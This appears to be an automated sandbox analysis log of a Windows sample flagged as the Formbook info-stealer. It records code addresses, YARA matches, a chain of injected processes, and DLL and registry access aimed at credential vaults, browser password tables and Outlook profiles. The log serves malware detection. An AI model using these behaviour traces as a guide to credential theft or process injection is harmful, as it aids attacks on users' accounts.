            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B53D402_2_00B53D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B59EB02_2_00B59EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B51F922_2_00B51F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13FD22_2_00B13FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13FD52_2_00B13FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0FFB12_2_00C0FFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0FF092_2_00C0FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03A003E66_2_03A003E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0394E3F06_2_0394E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FA3526_2_039FA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039C02C06_2_039C02C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039E02746_2_039E0274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03A001AA6_2_03A001AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039F81CC6_2_039F81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039DA1186_2_039DA118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039301006_2_03930100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039C81586_2_039C8158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039D20006_2_039D2000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0393C7C06_2_0393C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039647506_2_03964750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039407706_2_03940770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0395C6E06_2_0395C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03A005916_2_03A00591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039405356_2_03940535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039EE4F66_2_039EE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039E44206_2_039E4420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039F24466_2_039F2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039F6BD76_2_039F6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FAB406_2_039FAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0393EA806_2_0393EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03A0A9A66_2_03A0A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039429A06_2_039429A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039569626_2_03956962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039268B86_2_039268B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0396E8F06_2_0396E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0394A8406_2_0394A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039428406_2_03942840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039BEFA06_2_039BEFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03932FC86_2_03932FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0394CFE06_2_0394CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03960F306_2_03960F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039E2F306_2_039E2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03982F286_2_03982F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039B4F406_2_039B4F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03952E906_2_03952E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FCE936_2_039FCE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FEEDB6_2_039FEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FEE266_2_039FEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03940E596_2_03940E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03958DBF6_2_03958DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0393ADE06_2_0393ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039DCD1F6_2_039DCD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0394AD006_2_0394AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039E0CB56_2_039E0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03930CF26_2_03930CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03940C006_2_03940C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0398739A6_2_0398739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039F132D6_2_039F132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0392D34C6_2_0392D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039452A06_2_039452A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0395B2C06_2_0395B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039E12ED6_2_039E12ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0394B1B06_2_0394B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03A0B16B6_2_03A0B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0392F1726_2_0392F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0397516C6_2_0397516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039EF0CC6_2_039EF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039470C06_2_039470C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039F70E96_2_039F70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FF0E06_2_039FF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FF7B06_2_039FF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039F16CC6_2_039F16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039DD5B06_2_039DD5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039F75716_2_039F7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FF43F6_2_039FF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039314606_2_03931460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0395FB806_2_0395FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039B5BF06_2_039B5BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0397DBF96_2_0397DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FFB766_2_039FFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039DDAAC6_2_039DDAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03985AA06_2_03985AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039E1AA36_2_039E1AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039EDAC66_2_039EDAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FFA496_2_039FFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039F7A466_2_039F7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039B3A6C6_2_039B3A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039D59106_2_039D5910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039499506_2_03949950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0395B9506_2_0395B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039438E06_2_039438E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039AD8006_2_039AD800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03941F926_2_03941F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FFFB16_2_039FFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FFF096_2_039FFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03949EB06_2_03949EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0395FDC06_2_0395FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039F1D5A6_2_039F1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03943D406_2_03943D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039F7D736_2_039F7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039FFCF26_2_039FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_039B9C326_2_039B9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032118106_2_03211810
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032130A06_2_032130A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0321309B6_2_0321309B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0320C7606_2_0320C760
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0322B4206_2_0322B420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0320AA006_2_0320AA00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0320C9806_2_0320C980
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03214EC06_2_03214EC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381E2E86_2_0381E2E8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381E7A86_2_0381E7A8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381E4036_2_0381E403
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0381D8086_2_0381D808
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00B97E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00B85130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00BBEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00BCF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00B3B970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 039BF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0392B970 appears 278 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03987E54 appears 102 times
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: String function: 0009F885 appears 68 times
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: String function: 000A7750 appears 42 times
            Source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2088784839.0000000003FFD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs r3T-ENQ-O-2024-10856.exe
            Source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2086388303.0000000003E03000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs r3T-ENQ-O-2024-10856.exe
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@13/4
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CD712 GetLastError,FormatMessageW,0_2_000CD712
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000BB8B0 AdjustTokenPrivileges,CloseHandle,0_2_000BB8B0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000BBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000BBEC3
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_000CEA85
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_000C6F5B
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000DC604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_000DC604
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000831F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000831F2
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeFile created: C:\Users\user\AppData\Local\Temp\aut1F71.tmpJump to behavior
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000006.00000003.2829715517.0000000003427000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3346397218.0000000003427000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3346397218.0000000003454000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3346397218.0000000003430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: r3T-ENQ-O-2024-10856.exeReversingLabs: Detection: 26%
            Source: unknownProcess created: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"Jump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: r3T-ENQ-O-2024-10856.exeStatic file information: File size 1225728 > 1048576
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: r3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rYmePGTGlPk.exe, 00000005.00000002.3345960481.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3345962314.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
